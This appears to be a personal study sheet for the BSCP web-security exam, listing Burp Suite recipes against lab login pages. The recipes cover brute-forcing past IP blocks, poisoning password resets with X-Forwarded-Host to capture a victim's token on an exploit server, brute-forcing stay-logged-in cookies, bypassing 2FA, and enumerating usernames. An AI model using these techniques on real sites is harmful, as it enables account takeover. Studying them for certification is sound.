Authentication
Account Registration
Using specific mail domain
Creating email with more that 200 character before the @
symbol is then truncated to 255 characters. This identify the vulnerability in the account registration page logic flaw. In the email below the m
at the end of @dontwannacry.com
is character 255 exactly.
Bypass Brute IP brute force block
Click Resource pool to open the Resource pool side panel, then add the attack to a resource pool with Maximum concurrent requests set to
1
. By only sending one request at a time, you can ensure that your login attempts are sent to the server in the correct order.Click Payloads to open the Payloads side panel, then select position
1
from the Payload position drop-down list. Add a list of payloads that alternates between your username andcarlos
. Make sure that your username is first and thatcarlos
is repeated at least 100 times.Edit the list of candidate passwords and add your own password before each one. Make sure that your password is aligned with your username in the other list.
Select position
2
from the Payload position drop-down list, then add the password list. Start the attack.When the attack finishes, filter the results to hide responses with a
200
status code. Sort the remaining results by username. There should only be a single302
response for requests with the usernamecarlos
. Make a note of the password from the Payload 2 column.
Password reset
in Burp Repeater and add the
X-Forwarded-Host
header with your exploit server URL:X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net
Change the
username
parameter tocarlos
and send the request.Go to the exploit server and open the access log. You should see a
GET /forgot-password
request, which contains the victim's token as a query parameter. Make a note of this token.Go to the URL with password change code
Auth Token bypass Macro
If the authentication login is protected against brute force by using random token that is used on every login POST, a Burp Macro can be used to bypass protection.
Create Burp Macro
Open Proxy settings and select sessions under Project choices.
Scroll down to
Macros
, and add new macro.Select request from the list to use for the value to be used.
click
Configure item
and add custom parameter location to extract.Click OK to return to Sessions under Project choices.
Add a Session handling rule, and the editor dialogue opens.
In the dialogue, go to the "Scope" tab.
Under scope for the session handling rule editor, check Target, Intruder, and Repeater.
Still under "URL Scope", select
Include all URLs
.Close Settings.
Brute Force
Stay-login cookie brute force
Logout as current user.
Send the most recent GET /my-account request to Burp Intruder.
Select the cookie:
stay-logged-in
as injection position.Hash:
MD5
Add prefix:
carlos:
Encode:
Base64-encode
Add GREP under settings tab, to check for the string in the response
Update email
indicating successfully logged in attack.
New password error flow
Notice the behavior when you enter the wrong current password. If the two entries for the new password match, the account is locked. However, if you enter two different new passwords, an error message simply states Current password is incorrect
. If you enter a valid current password, but two different new passwords, the message says New passwords do not match
Enter your correct current password and two new passwords that do not match. Send this
POST /my-account/change-password
request to Burp Intruder.In Burp Intruder, change the
username
parameter tocarlos
and add a payload position to thecurrent-password
parameter. Make sure that the new password parameters are set to two different values. For example:username=carlos¤t-password=§incorrect-password§&new-password-1=123&new-password-2=abc
In the Payloads side panel, enter the list of passwords as the payload set.
Response time enumerate for creds
Intruder with brute force username and very long password, if response is longer than the user is exist.
Than use Inturder again to attack password.
If IP is blocked use second payload with X-Forwarded-For header
Brute force diffrent response
Identify that the login page & password reset is not protected by brute force attack, and no IP block or time-out enforced for invalid username or password.
Tip for the BSCP Exam, there is sometimes another user with weak password that can be brute forced. Carlos is not always the account to target to give a foothold access in stage 1.
Notice on the Intruder attack column for the GREP value,
Invalid username or password.
the one response message for a failed username attack do not contain full stop period at the end. Repeat the attack with this identified username, and Sniper attack the password field to identify302
response for valid login.
Another scenario to identify valid username on the WEB APP is to provide list of usernames on login and one invalid password value. In the Intruder attack results one response will contain message Incorrect password
.
Intruder attack injection position, username=§invalid-username§&password=SomeStupidLongCrazyWrongSecretPassword123456789
.
2FA bypass
change verify value to change username we want to get code for
intruder change post request for login2 parameter verify
brute force 2fa
Password Reset
password reset functionality still works even if you delete the value of the
temp-forgot-password-token
parameter in both the URL and request bodyif you remove the
current-password
parameter entirely, you are able to successfully change your password without providing your current one
Last updated